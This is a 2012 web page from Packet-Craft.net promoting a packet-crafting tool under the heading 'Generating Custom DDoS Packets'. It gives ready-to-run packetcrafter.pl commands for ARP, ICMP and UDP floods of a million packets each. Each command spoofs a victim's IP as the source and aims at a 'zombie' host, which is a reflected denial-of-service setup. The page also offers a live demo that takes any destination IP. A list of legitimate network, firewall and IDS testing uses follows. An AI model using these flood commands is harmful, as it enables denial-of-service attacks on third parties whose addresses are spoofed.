Packet-Craft.net Packet-Crafting.net Demo Demo Attacks Demo Help Apps Apps Options Order Online Data Link Layer Ethernet ARP Network Layer IPv4 IPv6 ICMP ICMP Type Transport Layer TCP TCP Flags SCTP UDP OSPF Application Layer BGP DHCP DNS HTTP NFS NTP RIP IMAP POP SMTP Misc Header Payload DDoS Attacks Malformed Packets Malicious Packets Contact Sales.2012 @ Packet-Craft.net Linux is a registered trademark of Linus Torvalds More Linux Legalese

Packet-Craft.net Generating Custom DDoS Packets Various Packet Crafting Apps are readily available http Flood, ICMP Flood, SMTP flood, SSH Flood, UDP flood, etc Live Online Packet Crafting Demo bsd.Packeet-Craft.net/Demo Demo DDoS GUI just enter your destinationIP in the GUI for a quick demo Generate 1,000,000 arp packets at 10,000 packets/sec ( ARP flood ) packetcrafter.pl -skip -cli -arp -src spoofVictimIP -dst zombieIP -c 1000000 -i 0.0001 Generate 1,000,000 icmp packets at 10,000 packets/sec ( ICMP flood ) packetcrafter.pl -skip -cli -icmp -src spoofVictimIP -dst zombieIP -c 1000000 -i 0.0001 Generate 1,000,000 udp packets at 10,000 packets/sec ( UDP flood ) packetcrafter.pl -skip -cli -udp -src spoofVictimIP -dst zombieIP -c 1000000 -i 0.0001 Other Bandwidth Flooding methodologies Packet Crafting Howto Features and Capabilities You should be familiar with the various packet crafting software sending custom malformed headers spoofed src and dst addresses spoofed src and dst ports spoofed src and dst MAC addresses random src and dst addresses random src and dst ports random src and dst MAC addresses randomly change the TCP flags status send random and/or bad checksum bad fragmentation and reassembly arbitrary ARP OpCodes arbitrary Ethernet Types arbitrary Hardware Types arbitrary IP protocols arbitrary ICMP types and codes send random payload, pre-defined payload, etc... ... etc ... out-of-order packets dropped packets capturing packets replaying previous packets analyzing packets/traffic monitoring traffic Have a clear idea of what you are checking for: corporate infrastructure policies computer system security audits PCI, HIPPA, GLBA, SOX etc... compliance audits .. database server testing dns server testing firewall testing verify packets from disallowed addresses are dropped verify certain packets are dropped mail server testing web server testing server ( cpu/memory ) load testing buffer overflow testing stack overflow testing bandwidth testing latency testing network load and network stress testing scalability testing IDS & IPS testing with these customized packets, your IDS/IPS intruder alarms should light up like a xmas tree exploits testing penetration testing SMS testing VOIP testing vulnerability testing How do you verify your tests: You will need to run a Sniffer to capture the custom packets You will need to run a Protocol Analyzer to view the contents of the custom packets How to verify it DID what it supposed to do with the incoming custom packets How to verify it did NOT do what it "supposed to do" with the incoming custom packets

Copyright © 2000	Linux-Consulting	All Rights Reserved.	Updated: Wed Oct 17 16:01:38 2012 PDT